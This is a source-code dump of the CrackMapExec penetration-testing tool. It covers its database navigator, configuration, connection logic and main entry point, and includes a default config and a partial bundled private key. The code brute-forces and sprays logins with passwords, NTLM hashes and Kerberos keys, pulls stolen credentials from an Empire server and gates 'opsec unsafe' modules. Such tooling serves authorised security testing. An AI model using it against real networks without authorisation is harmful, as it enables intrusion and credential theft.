simple_rows = list((row[0], row[1], row[2], row[3], row[5]) for row in rows)
write_csv(filename, csv_header_simple, simple_rows)
elif line[1].lower() == "detailed":
write_csv(filename, csv_header_detailed, rows)
elif line[1].lower() == "signing":
hosts = self.db.get_hosts("signing")
signing_hosts = [host[1] for host in hosts]
write_list(filename, signing_hosts)
else:
print(f"[-] No such export option: {line[1]}")
return
print("[+] WCC exported")
else:
print("[-] Invalid argument, specify creds, hosts, local_admins, shares, wcc or dpapi")
@staticmethod
def help_export():
help_string = """
export [creds|hosts|local_admins|shares|signing|keys] [simple|detailed|*] [filename]
Exports information to a specified file
* hosts has an additional third option from simple and detailed: signing - this simply writes a list of ips of
hosts where signing is enabled
* keys' third option is either "all" or an id of a key to export
export keys [all|id] [filename]
"""
print_help(help_string)
def do_import(self, line):
if not line:
return
if line == "empire":
headers = {"Content-Type": "application/json"}
# Pull the username and password from the config file
payload = {
"username": self.config.get("Empire", "username"),
"password": self.config.get("Empire", "password"),
}
# Pull the host and port from the config file
base_url = f"https://{self.config.get('Empire', 'api_host')}:{self.config.get('Empire', 'api_port')}"
try:
r = post(
base_url + "/api/admin/login",
json=payload,
headers=headers,
verify=False,
)
if r.status_code == 200:
token = r.json()["token"]
url_params = {"token": token}
r = get(
base_url + "/api/creds",
headers=headers,
params=url_params,
verify=False,
)
creds = r.json()
for cred in creds["creds"]:
if cred["credtype"] == "token" or cred["credtype"] == "krbtgt" or cred["username"].endswith("$"):
continue
self.db.add_credential(
cred["credtype"],
cred["domain"],
cred["username"],
cred["password"],
)
print("[+] Empire credential import successful")
else:
print("[-] Error authenticating to Empire's RESTful API server!")
except ConnectionError as e:
print(f"[-] Unable to connect to Empire's RESTful API server: {e}")
class CMEDBMenu(cmd.Cmd):
def __init__(self, config_path):
cmd.Cmd.__init__(self)
self.config_path = config_path
try:
self.config = configparser.ConfigParser()
self.config.read(self.config_path)
except Exception as e:
print(f"[-] Error reading cme.conf: {e}")
sys.exit(1)
self.conn = None
self.p_loader = ProtocolLoader()
self.protocols = self.p_loader.get_protocols()
self.workspace = self.config.get("CME", "workspace")
self.do_workspace(self.workspace)
self.db = self.config.get("CME", "last_used_db")
if self.db:
self.do_proto(self.db)
def write_configfile(self):
with open(self.config_path, "w") as configfile:
self.config.write(configfile)
def do_proto(self, proto):
if not proto:
return
proto_db_path = path_join(WORKSPACE_DIR, self.workspace, f"{proto}.db")
if exists(proto_db_path):
self.conn = create_db_engine(proto_db_path)
db_nav_object = self.p_loader.load_protocol(self.protocols[proto]["nvpath"])
db_object = self.p_loader.load_protocol(self.protocols[proto]["dbpath"])
self.config.set("CME", "last_used_db", proto)
self.write_configfile()
try:
proto_menu = getattr(db_nav_object, "navigator")(self, getattr(db_object, "database")(self.conn), proto)
proto_menu.cmdloop()
except UserExitedProto:
pass
@staticmethod
def help_proto():
help_string = """
proto [smb|mssql|winrm]
*unimplemented protocols: ftp, rdp, ldap, ssh
Changes cmedb to the specified protocol
"""
print_help(help_string)
def do_workspace(self, line):
line = line.strip()
if not line:
subcommand = ""
self.help_workspace()
else:
subcommand = line.split()[0]
if subcommand == "create":
new_workspace = line.split()[1].strip()
print(f"[*] Creating workspace '{new_workspace}'")
self.create_workspace(new_workspace, self.p_loader, self.protocols)
self.do_workspace(new_workspace)
elif subcommand == "list":
print("[*] Enumerating Workspaces")
for workspace in listdir(path_join(WORKSPACE_DIR)):
if workspace == self.workspace:
print("==> " + workspace)
else:
print(workspace)
elif exists(path_join(WORKSPACE_DIR, line)):
self.config.set("CME", "workspace", line)
self.write_configfile()
self.workspace = line
self.prompt = f"cmedb ({line}) > "
@staticmethod
def help_workspace():
help_string = """
workspace [create <targetName> | workspace list | workspace <targetName>]
"""
print_help(help_string)
@staticmethod
def do_exit(line):
sys.exit()
@staticmethod
def help_exit():
help_string = """
Exits
"""
print_help(help_string)
@staticmethod
def create_workspace(workspace_name, p_loader, protocols):
os.mkdir(path_join(WORKSPACE_DIR, workspace_name))
for protocol in protocols.keys():
protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
proto_db_path = path_join(WORKSPACE_DIR, workspace_name, f"{protocol}.db")
if not exists(proto_db_path):
print(f"[*] Initializing {protocol.upper()} protocol database")
conn = connect(proto_db_path)
c = conn.cursor()
# try to prevent some weird sqlite I/O errors
c.execute("PRAGMA journal_mode = OFF")
c.execute("PRAGMA foreign_keys = 1")
getattr(protocol_object, "database").db_schema(c)
# commit the changes and close everything off
conn.commit()
conn.close()
def delete_workspace(workspace_name):
shutil.rmtree(path_join(WORKSPACE_DIR, workspace_name))
def initialize_db(logger):
if not exists(path_join(WS_PATH, "default")):
logger.debug("Creating default workspace")
os.mkdir(path_join(WS_PATH, "default"))
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
for protocol in protocols.keys():
protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
proto_db_path = path_join(WS_PATH, "default", f"{protocol}.db")
if not exists(proto_db_path):
logger.debug(f"Initializing {protocol.upper()} protocol database")
conn = connect(proto_db_path)
c = conn.cursor()
# try to prevent some weird sqlite I/O errors
c.execute("PRAGMA journal_mode = OFF") # could try setting to PERSIST if DB corruption starts occurring
c.execute("PRAGMA foreign_keys = 1")
# set a small timeout (5s) so if another thread is writing to the database, the entire program doesn't crash
c.execute("PRAGMA busy_timeout = 5000")
getattr(protocol_object, "database").db_schema(c)
# commit the changes and close everything off
conn.commit()
conn.close()
def main():
if not exists(CONFIG_PATH):
print("[-] Unable to find config file")
sys.exit(1)
try:
cmedbnav = CMEDBMenu(CONFIG_PATH)
cmedbnav.cmdloop()
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
================================================
FILE: cme/config.py
================================================
# coding=utf-8
import os
from os.path import join as path_join
import configparser
from cme.paths import CME_PATH, DATA_PATH
from cme.first_run import first_run_setup
from cme.logger import cme_logger
from ast import literal_eval
cme_default_config = configparser.ConfigParser()
cme_default_config.read(path_join(DATA_PATH, "cme.conf"))
cme_config = configparser.ConfigParser()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
if "CME" not in cme_config.sections():
first_run_setup()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
# Check if there are any missing options in the config file
for section in cme_default_config.sections():
for option in cme_default_config.options(section):
if not cme_config.has_option(section, option):
cme_logger.display(f"Adding missing option '{option}' in config section '{section}' to cme.conf")
cme_config.set(section, option, cme_default_config.get(section, option))
with open(path_join(CME_PATH, "cme.conf"), "w") as config_file:
cme_config.write(config_file)
#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
cme_workspace = cme_config.get("CME", "workspace", fallback="default")
pwned_label = cme_config.get("CME", "pwn3d_label", fallback="Pwn3d!")
audit_mode = cme_config.get("CME", "audit_mode", fallback=False)
reveal_chars_of_pwd = int(cme_config.get("CME", "reveal_chars_of_pwd", fallback=0))
config_log = cme_config.getboolean("CME", "log_mode", fallback=False)
ignore_opsec = cme_config.getboolean("CME", "ignore_opsec", fallback=False)
host_info_colors = literal_eval(cme_config.get("CME", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
if len(host_info_colors) != 4:
cme_logger.error("Config option host_info_colors must have 4 values! Using default values.")
host_info_colors = cme_default_config.get("CME", "host_info_colors")
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
def process_secret(text):
hidden = text[:reveal_chars_of_pwd]
return text if not audit_mode else hidden+audit_mode * 8
================================================
FILE: cme/connection.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import random
import socket
from socket import AF_INET, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME
from socket import getaddrinfo
from os.path import isfile
from threading import BoundedSemaphore
from functools import wraps
from time import sleep
from ipaddress import ip_address
from cme.config import pwned_label
from cme.helpers.logger import highlight
from cme.logger import cme_logger, CMEAdapter
from cme.context import Context
from impacket.dcerpc.v5 import transport
sem = BoundedSemaphore(1)
global_failed_logins = 0
user_failed_logins = {}
def gethost_addrinfo(hostname):
try:
for res in getaddrinfo( hostname, None, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
af, socktype, proto, canonname, sa = res
host = canonname if ip_address(sa[0]).is_link_local else sa[0]
except socket.gaierror:
for res in getaddrinfo( hostname, None, AF_INET, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME):
af, socktype, proto, canonname, sa = res
host = sa[0] if sa[0] else canonname
return host
def requires_admin(func):
def _decorator(self, *args, **kwargs):
if self.admin_privs is False:
return
return func(self, *args, **kwargs)
return wraps(func)(_decorator)
def dcom_FirewallChecker(iInterface, timeout):
stringBindings = iInterface.get_cinstance().get_string_bindings()
for strBinding in stringBindings:
if strBinding['wTowerId'] == 7:
if strBinding['aNetworkAddr'].find('[') >= 0:
binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')
bindingPort = '[' + bindingPort
else:
binding = strBinding['aNetworkAddr']
bindingPort = ''
if binding.upper().find(iInterface.get_target().upper()) >= 0:
stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]
break
elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition('.')[0]) >= 0:
stringBinding = 'ncacn_ip_tcp:%s%s' % (iInterface.get_target(), bindingPort)
if "stringBinding" not in locals():
return True, None
try:
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpctransport.set_connect_timeout(timeout)
rpctransport.connect()
rpctransport.disconnect()
except:
return False, stringBinding
else:
return True, stringBinding
class connection(object):
def __init__(self, args, db, host):
self.domain = None
self.args = args
self.db = db
self.hostname = host
self.conn = None
self.admin_privs = False
self.password = ""
self.username = ""
self.kerberos = True if self.args.kerberos or self.args.use_kcache or self.args.aesKey else False
self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost
self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
self.failed_logins = 0
self.local_ip = None
self.logger = cme_logger
try:
self.host = gethost_addrinfo(self.hostname)
if self.args.kerberos:
self.host = self.hostname
self.logger.info(f"Socket info: host={self.host}, hostname={self.hostname}, kerberos={ 'True' if self.args.kerberos else 'False' }")
except Exception as e:
self.logger.info(f"Error resolving hostname {self.hostname}: {e}")
return
if args.jitter:
jitter = args.jitter
if "-" in jitter:
start, end = jitter.split("-")
jitter = (int(start), int(end))
else:
jitter = (0, int(jitter))
value = random.choice(range(jitter[0], jitter[1]))
self.logger.debug(f"Doin' the jitterbug for {value} second(s)")
sleep(value)
try:
self.proto_flow()
except Exception as e:
self.logger.exception(f"Exception while calling proto_flow() on target {self.host}: {e}")
@staticmethod
def proto_args(std_parser, module_parser):
return
def proto_logger(self):
pass
def enum_host_info(self):
return
def print_host_info(self):
return
def create_conn_obj(self):
return
def check_if_admin(self):
return
def kerberos_login(
self,
domain,
username,
password="",
ntlm_hash="",
aesKey="",
kdcHost="",
useCache=False,
):
return
def plaintext_login(self, domain, username, password):
return
def hash_login(self, domain, username, ntlm_hash):
return
def proto_flow(self):
self.logger.debug(f"Kicking off proto_flow")
self.proto_logger()
if self.create_conn_obj():
self.enum_host_info()
if self.print_host_info():
# because of null session
if self.login() or (self.username == "" and self.password == ""):
if hasattr(self.args, "module") and self.args.module:
self.call_modules()
else:
self.call_cmd_args()
def call_cmd_args(self):
for k, v in vars(self.args).items():
if hasattr(self, k) and hasattr(getattr(self, k), "__call__"):
if v is not False and v is not None:
self.logger.debug(f"Calling {k}()")
r = getattr(self, k)()
def call_modules(self):
for module in self.module:
self.logger.debug(f"Loading module {module.name} - {module}")
module_logger = CMEAdapter(
extra={
"module_name": module.name.upper(),
"host": self.host,
"port": self.args.port,
"hostname": self.hostname,
},
)
self.logger.debug(f"Loading context for module {module.name} - {module}")
context = Context(self.db, module_logger, self.args)
context.localip = self.local_ip
if hasattr(module, "on_request") or hasattr(module, "has_response"):
self.logger.debug(f"Module {module.name} has on_request or has_response methods")
self.server.connection = self
self.server.context.localip = self.local_ip
if hasattr(module, "on_login"):
self.logger.debug(f"Module {module.name} has on_login method")
module.on_login(context, self)
if self.admin_privs and hasattr(module, "on_admin_login"):
self.logger.debug(f"Module {module.name} has on_admin_login method")
module.on_admin_login(context, self)
if (not hasattr(module, "on_request") and not hasattr(module, "has_response")) and hasattr(module, "on_shutdown"):
self.logger.debug(f"Module {module.name} has on_shutdown method")
module.on_shutdown(context, self)
def inc_failed_login(self, username):
global global_failed_logins
global user_failed_logins
if username not in user_failed_logins.keys():
user_failed_logins[username] = 0
user_failed_logins[username] += 1
global_failed_logins += 1
self.failed_logins += 1
def over_fail_limit(self, username):
global global_failed_logins
global user_failed_logins
if global_failed_logins == self.args.gfail_limit:
return True
if self.failed_logins == self.args.fail_limit:
return True
if username in user_failed_logins.keys():
if self.args.ufail_limit == user_failed_logins[username]:
return True
return False
def query_db_creds(self):
"""
Queries the database for credentials to be used for authentication.
Valid cred_id values are:
- a single cred_id
- a range specified with a dash (ex. 1-5)
- 'all' to select all credentials
:return: domain[], username[], owned[], secret[], cred_type[]
"""
domain = []
username = []
owned = []
secret = []
cred_type = []
creds = [] # list of tuples (cred_id, domain, username, secret, cred_type, pillaged_from) coming from the database
data = [] # Arbitrary data needed for the login, e.g. ssh_key
for cred_id in self.args.cred_id:
if isinstance(cred_id, str) and cred_id.lower() == 'all':
creds = self.db.get_credentials()
else:
if not self.db.get_credentials(filter_term=int(cred_id)):
self.logger.error('Invalid database credential ID {}!'.format(cred_id))
continue
creds.extend(self.db.get_credentials(filter_term=int(cred_id)))
for cred in creds:
c_id, domain_single, username_single, secret_single, cred_type_single, pillaged_from = cred
domain.append(domain_single)
username.append(username_single)
owned.append(False) # As these are likely valid we still want to test them if they are specified in the command line
secret.append(secret_single)
cred_type.append(cred_type_single)
if len(secret) != len(data): data = [None] * len(secret)
return domain, username, owned, secret, cred_type, data
def parse_credentials(self):
"""
Parse credentials from the command line or from a file specified.
Usernames can be specified with a domain (domain\\username) or without (username).
If the file contains domain\\username the domain specified will be overwritten by the one in the file.
:return: domain[], username[], owned[], secret[], cred_type[]
"""
domain = []
username = []
owned = []
secret = []
cred_type = []
# Parse usernames
for user in self.args.username:
if isfile(user):
with open(user, 'r') as user_file:
for line in user_file:
if "\\" in line:
domain_single, username_single = line.split("\\")
else:
domain_single = self.args.domain if hasattr(self.args, "domain") and self.args.domain else self.domain
username_single = line
domain.append(domain_single)
username.append(username_single.strip())
owned.append(False)
else:
if "\\" in user:
domain_single, username_single = user.split("\\")
else:
domain_single = self.args.domain if hasattr(self.args, "domain") and self.args.domain else self.domain
username_single = user
domain.append(domain_single)
username.append(username_single)
owned.append(False)
# Parse passwords
for password in self.args.password:
if isfile(password):
with open(password, 'r') as password_file:
for line in password_file:
secret.append(line.strip())
cred_type.append('plaintext')
else:
secret.append(password)
cred_type.append('plaintext')
# Parse NTLM-hashes
if hasattr(self.args, "hash") and self.args.hash:
for ntlm_hash in self.args.hash:
if isfile(ntlm_hash):
with open(ntlm_hash, 'r') as ntlm_hash_file:
for line in ntlm_hash_file:
secret.append(line.strip())
cred_type.append('hash')
else:
secret.append(ntlm_hash)
cred_type.append('hash')
# Parse AES keys
if self.args.aesKey:
for aesKey in self.args.aesKey:
if isfile(aesKey):
with open(aesKey, 'r') as aesKey_file:
for line in aesKey_file:
secret.append(line.strip())
cred_type.append('aesKey')
else:
secret.append(aesKey)
cred_type.append('aesKey')
return domain, username, owned, secret, cred_type, [None] * len(secret)
def try_credentials(self, domain, username, owned, secret, cred_type, data=None):
"""
Try to login using the specified credentials and protocol.
Possible login methods are:
- plaintext (/kerberos)
- NTLM-hash (/kerberos)
- AES-key
"""
if self.over_fail_limit(username):
return False
if self.args.continue_on_success and owned:
return False
# Enforcing FQDN for SMB if not using local authentication. Related issues/PRs: #26, #28, #24, #38
if self.args.protocol == 'smb' and not self.args.local_auth and "." not in domain and not self.args.laps and secret != "" and not (self.domain.upper() == self.hostname.upper()) :
self.logger.error(f"Domain {domain} for user {username.rstrip()} need to be FQDN ex:domain.local, not domain")
return False
with sem:
if cred_type == 'plaintext':
if self.args.kerberos:
return self.kerberos_login(domain, username, secret, '', '', self.kdcHost, False)
elif hasattr(self.args, "domain"): # Some protocolls don't use domain for login
return self.plaintext_login(domain, username, secret)
elif self.args.protocol == 'ssh':
return self.plaintext_login(username, secret, data)
else:
return self.plaintext_login(username, secret)
elif cred_type == 'hash':
if self.args.kerberos:
return self.kerberos_login(domain, username, '', secret, '', self.kdcHost, False)
return self.hash_login(domain, username, secret)
elif cred_type == 'aesKey':
return self.kerberos_login(domain, username, '', '', secret, self.kdcHost, False)
def login(self):
"""
Try to login using the credentials specified in the command line or in the database.
:return: True if the login was successful and "--continue-on-success" was not specified, False otherwise.
"""
# domain[n] always corresponds to username[n] and owned [n]
domain = []
username = []
owned = [] # Determines whether we have found a valid credential for this user. Default: False
# secret[n] always corresponds to cred_type[n]
secret = []
cred_type = []
data = [] # Arbitrary data needed for the login, e.g. ssh_key
if self.args.cred_id:
db_domain, db_username, db_owned, db_secret, db_cred_type, db_data = self.query_db_creds()
domain.extend(db_domain)
username.extend(db_username)
owned.extend(db_owned)
secret.extend(db_secret)
cred_type.extend(db_cred_type)
data.extend(db_data)
if self.args.username:
parsed_domain, parsed_username, parsed_owned, parsed_secret, parsed_cred_type, parsed_data = self.parse_credentials()
domain.extend(parsed_domain)
username.extend(parsed_username)
owned.extend(parsed_owned)
secret.extend(parsed_secret)
cred_type.extend(parsed_cred_type)
data.extend(parsed_data)
if self.args.use_kcache:
with sem:
username = self.args.username[0] if len(self.args.username) else ""
password = self.args.password[0] if len(self.args.password) else ""
self.kerberos_login(self.domain, username, password, "", "", self.kdcHost, True)
self.logger.info("Successfully authenticated using Kerberos cache")
return True
if not self.args.no_bruteforce:
for secr_index, secr in enumerate(secret):
for user_index, user in enumerate(username):
if self.try_credentials(domain[user_index], user, owned[user_index], secr, cred_type[secr_index], data[secr_index]):
owned[user_index] = True
if not self.args.continue_on_success:
return True
else:
if len(username) != len(secret):
self.logger.error("Number provided of usernames and passwords/hashes do not match!")
return False
for user_index, user in enumerate(username):
if self.try_credentials(domain[user_index], user, owned[user_index], secret[user_index], cred_type[user_index], data[user_index]) and not self.args.continue_on_success:
owned[user_index] = True
if not self.args.continue_on_success:
return True
def mark_pwned(self):
return highlight(f"({pwned_label})" if self.admin_privs else "")
================================================
FILE: cme/console.py
================================================
from rich.console import Console
cme_console = Console(soft_wrap=True, tab_size=4)
================================================
FILE: cme/context.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import configparser
import os
class Context:
def __init__(self, db, logger, args):
for key, value in vars(args).items():
setattr(self, key, value)
self.db = db
self.log_folder_path = os.path.join(os.path.expanduser("~/.cme"), "logs")
self.localip = None
self.conf = configparser.ConfigParser()
self.conf.read(os.path.expanduser("~/.cme/cme.conf"))
self.log = logger
# self.log.debug = logging.debug
================================================
FILE: cme/crackmapexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.helpers.logger import highlight
from cme.helpers.misc import identify_target_file
from cme.parsers.ip import parse_targets
from cme.parsers.nmap import parse_nmap_xml
from cme.parsers.nessus import parse_nessus_file
from cme.cli import gen_cli_args
from cme.loaders.protocolloader import ProtocolLoader
from cme.loaders.moduleloader import ModuleLoader
from cme.servers.http import CMEServer
from cme.first_run import first_run_setup
from cme.context import Context
from cme.paths import CME_PATH, DATA_PATH
from cme.console import cme_console
from cme.logger import cme_logger
from cme.config import cme_config, cme_workspace, config_log, ignore_opsec
from concurrent.futures import ThreadPoolExecutor, as_completed
import asyncio
import cme.helpers.powershell as powershell
import shutil
import webbrowser
import random
import os
from os.path import exists
from os.path import join as path_join
from sys import exit
import logging
import sqlalchemy
from rich.progress import Progress
from sys import platform
# Increase file_limit to prevent error "Too many open files"
if platform != "win32":
import resource
file_limit = list(resource.getrlimit(resource.RLIMIT_NOFILE))
if file_limit[1] > 10000:
file_limit[0] = 10000
else:
file_limit[0] = file_limit[1]
file_limit = tuple(file_limit)
resource.setrlimit(resource.RLIMIT_NOFILE, file_limit)
try:
import librlers
except:
print("Incompatible python version, try with another python version or another binary 3.8 / 3.9 / 3.10 / 3.11 that match your python version (python -V)")
exit(1)
def create_db_engine(db_path):
db_engine = sqlalchemy.create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
return db_engine
async def start_run(protocol_obj, args, db, targets):
cme_logger.debug(f"Creating ThreadPoolExecutor")
if args.no_progress or len(targets) == 1:
with ThreadPoolExecutor(max_workers=args.threads + 1) as executor:
cme_logger.debug(f"Creating thread for {protocol_obj}")
_ = [executor.submit(protocol_obj, args, db, target) for target in targets]
else:
with Progress(console=cme_console) as progress:
with ThreadPoolExecutor(max_workers=args.threads + 1) as executor:
current = 0
total = len(targets)
tasks = progress.add_task(
f"[green]Running CME against {total} {'target' if total == 1 else 'targets'}",
total=total,
)
cme_logger.debug(f"Creating thread for {protocol_obj}")
futures = [executor.submit(protocol_obj, args, db, target) for target in targets]
for _ in as_completed(futures):
current += 1
progress.update(tasks, completed=current)
def main():
first_run_setup(cme_logger)
root_logger = logging.getLogger("root")
args = gen_cli_args()
if args.verbose:
cme_logger.logger.setLevel(logging.INFO)
root_logger.setLevel(logging.INFO)
elif args.debug:
cme_logger.logger.setLevel(logging.DEBUG)
root_logger.setLevel(logging.DEBUG)
else:
cme_logger.logger.setLevel(logging.ERROR)
root_logger.setLevel(logging.ERROR)
# if these are the same, it might double log to file (two FileHandlers will be added)
# but this should never happen by accident
if config_log:
cme_logger.add_file_log()
if hasattr(args, "log") and args.log:
cme_logger.add_file_log(args.log)
cme_logger.debug(f"Passed args: {args}")
# FROM HERE ON A PROTOCOL IS REQUIRED
if not args.protocol:
exit(1)
if args.protocol == "ssh":
if args.key_file:
if not args.password:
cme_logger.fail(f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`")
exit(1)
if args.use_kcache and not os.environ.get("KRB5CCNAME"):
cme_logger.error("KRB5CCNAME environment variable is not set")
exit(1)
module_server = None
targets = []
server_port_dict = {"http": 80, "https": 443, "smb": 445}
if hasattr(args, "cred_id") and args.cred_id:
for cred_id in args.cred_id:
if "-" in str(cred_id):
start_id, end_id = cred_id.split("-")
try:
for n in range(int(start_id), int(end_id) + 1):
args.cred_id.append(n)
args.cred_id.remove(cred_id)
except Exception as e:
cme_logger.error(f"Error parsing database credential id: {e}")
exit(1)
if hasattr(args, "target") and args.target:
for target in args.target:
if exists(target) and os.path.isfile(target):
target_file_type = identify_target_file(target)
if target_file_type == "nmap":
targets.extend(parse_nmap_xml(target, args.protocol))
elif target_file_type == "nessus":
targets.extend(parse_nessus_file(target, args.protocol))
else:
with open(target, "r") as target_file:
for target_entry in target_file:
targets.extend(parse_targets(target_entry.strip()))
else:
targets.extend(parse_targets(target))
# The following is a quick hack for the powershell obfuscation functionality, I know this is yucky
if hasattr(args, "clear_obfscripts") and args.clear_obfscripts:
shutil.rmtree(os.path.expanduser("~/.cme/obfuscated_scripts/"))
os.mkdir(os.path.expanduser("~/.cme/obfuscated_scripts/"))
cme_logger.success("Cleared cached obfuscated PowerShell scripts")
if hasattr(args, "obfs") and args.obfs:
powershell.obfuscate_ps_scripts = True
cme_logger.debug(f"Protocol: {args.protocol}")
p_loader = ProtocolLoader()
protocol_path = p_loader.get_protocols()[args.protocol]["path"]
cme_logger.debug(f"Protocol Path: {protocol_path}")
protocol_db_path = p_loader.get_protocols()[args.protocol]["dbpath"]
cme_logger.debug(f"Protocol DB Path: {protocol_db_path}")
protocol_object = getattr(p_loader.load_protocol(protocol_path), args.protocol)
cme_logger.debug(f"Protocol Object: {protocol_object}")
protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path), "database")
cme_logger.debug(f"Protocol DB Object: {protocol_db_object}")
db_path = path_join(CME_PATH, "workspaces", cme_workspace, f"{args.protocol}.db")
cme_logger.debug(f"DB Path: {db_path}")
db_engine = create_db_engine(db_path)
db = protocol_db_object(db_engine)
# with the new cme/config.py this can be eventually removed, as it can be imported anywhere
setattr(protocol_object, "config", cme_config)
if args.module or args.list_modules:
loader = ModuleLoader(args, db, cme_logger)
modules = loader.list_modules()
if args.list_modules:
for name, props in sorted(modules.items()):
if args.protocol in props["supported_protocols"]:
cme_logger.display(f"{name:<25} {props['description']}")
exit(0)
elif args.module and args.show_module_options:
for module in args.module:
cme_logger.display(f"{module} module options:\n{modules[module]['options']}")
exit(0)
elif args.module:
cme_logger.debug(f"Modules to be Loaded: {args.module}, {type(args.module)}")
for m in map(str.lower, args.module):
if m not in modules:
cme_logger.error(f"Module not found: {m}")
exit(1)
cme_logger.debug(f"Loading module {m} at path {modules[m]['path']}")
module = loader.init_module(modules[m]["path"])
if not module.opsec_safe:
if ignore_opsec:
cme_logger.debug(f"ignore_opsec is set in the configuration, skipping prompt")
cme_logger.display(f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded")
else:
ans = input(
highlight(
"[!] Module is not opsec safe, are you sure you want to run this? [Y/n] For global configuration, change ignore_opsec value to True on ~/cme/cme.conf",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
if not module.multiple_hosts and len(targets) > 1:
ans = input(
highlight(
"[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
if hasattr(module, "on_request") or hasattr(module, "has_response"):
if hasattr(module, "required_server"):
args.server = module.required_server
if not args.server_port:
args.server_port = server_port_dict[args.server]
# loading a module server multiple times will obviously fail
try:
context = Context(db, cme_logger, args)
module_server = CMEServer(
module,
context,
cme_logger,
args.server_host,
args.server_port,
args.server,
)
module_server.start()
protocol_object.server = module_server.server
except Exception as e:
cme_logger.error(f"Error loading module server for {module}: {e}")
cme_logger.debug(f"proto_object: {protocol_object}, type: {type(protocol_object)}")
cme_logger.debug(f"proto object dir: {dir(protocol_object)}")
# get currently set modules, otherwise default to empty list
current_modules = getattr(protocol_object, "module", [])
current_modules.append(module)
setattr(protocol_object, "module", current_modules)
cme_logger.debug(f"proto object module after adding: {protocol_object.module}")
if hasattr(args, "ntds") and args.ntds and not args.userntds:
ans = input(
highlight(
"[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] ",
"red",
)
)
if ans.lower() not in ["y", "yes", ""]:
exit(1)
try:
asyncio.run(start_run(protocol_object, args, db, targets))
except KeyboardInterrupt:
cme_logger.debug("Got keyboard interrupt")
finally:
if module_server:
module_server.shutdown()
db_engine.dispose()
if __name__ == "__main__":
main()
================================================
FILE: cme/data/cme.conf
================================================
[CME]
workspace = default
last_used_db = smb
pwn3d_label = Pwn3d!
audit_mode =
reveal_chars_of_pwd = 0
log_mode = False
ignore_opsec = True
host_info_colors = ["green", "red", "yellow", "cyan"]
[BloodHound]
bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
[Empire]
api_host = 127.0.0.1
api_port = 1337
username = empireadmin
password = password123
[Metasploit]
rpc_host = 127.0.0.1
rpc_port = 55552
password = abc123
================================================
FILE: cme/data/default.pem
================================================
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDLRxCDVVXmjcFW
rvuwIZh6ywLNtffsTFQ2QAykUTl6CGzn+rpoz/s/AX7s2/dWkv+pcUULNNeH2Ae9
YNhM7vQqDzKA4Rj1FzVO9LIQot3F32e9SQWk2zJ0dia3uaxrrZTQeLOpISa9g3Q0
nnvflX2KjarZ/OUrxSJA3HRgx0C0N7bmyC/jXSeM8cLQxJjIdNpxeMfSA5koeEEJ
hzaWZLgtJpX5NOxpeJBRfhPSOL3r2t2qUGnzctvHbPZmdyRwIRCAiJNSHZd+CirC
ayplzdaxDZ0rlMcpaeodOTpusBLmAWEP6uQEKrRBgL+AVOo7DpncIbmMQPkSA3La
Slyh+dgRAgMBAAECggEBAJW58l/KK0t2fkHrAVfqZvWLMrVyovpZ/m03IBin+z33
lsAH3eX1y4nNAEBWhQgvnkCgPcrTUS2t4YWMH8YK+60/JGPpaQid35YYhk/app9o
vnCdqJqVGcTOghYxnN5zLHmhbjPVR0Ov35giY/t7kMzNLFsD+4kR2vkLaG0gVnhm
gAZ0M7bN35LQT0Wk1SFjVPLwdsPb/Jvxo7ly7wVv7Y2D1vNCYoBQGoFL7/noGene
mMQ+OVawP58KqoYn/WRLI9zmTWzohXvYJYvm+SiXultB4aBGgp4saYjD8gwSOBml
wbz2LyRCcDVi46yDcy7iSLmMr6c4ZdkUpxRvtPJI5wECgYEA+AgBrSdOoU+pzPas
HlrprQEn5XHn990wfJj5N77MtpJu7Gmf/0tWGQQ3wohmu8dfNZrE8ZsEupRUVIYh
5mLOWMmujkjNpp6A5LzZcp3hnLklORoUirZka66QgC9RSYv08PlPLy7ru+aHYsg1
uPZNcf+KgpQoCg10LFrXaCh8GlUCgYEA0c74b1Rxg2+Dr3pGfvoZcQhtg1FUOWR9
poNFkkV7vAnzoR9xLDvRtsOcGL7fu/WDtBg/XsddzfaKtU2cE05cF888OV+TYs6U
Cturp+pz+Yyslh6x3AgygnpMGJp6rk5D9LLHmIWPpCPjbBSofEQL9IxKoQOYOlvm
7VrBu7Kbus0CgYAD6NRl702s+z147pZt8A7o3DDNzArU/FaMUDj1aPt/ETXQYiXU
d1KHGGrslQvRf+X/SU47ZK8hZb8iie602+/WtG8c7QbYznzHnjZrORPaTYzJpqCW
QyO4EstSSeylFSCqP7PA0aODlbGim/dE0BUOa/G59y3eYrHnFRN6H9E89QKBgHHK
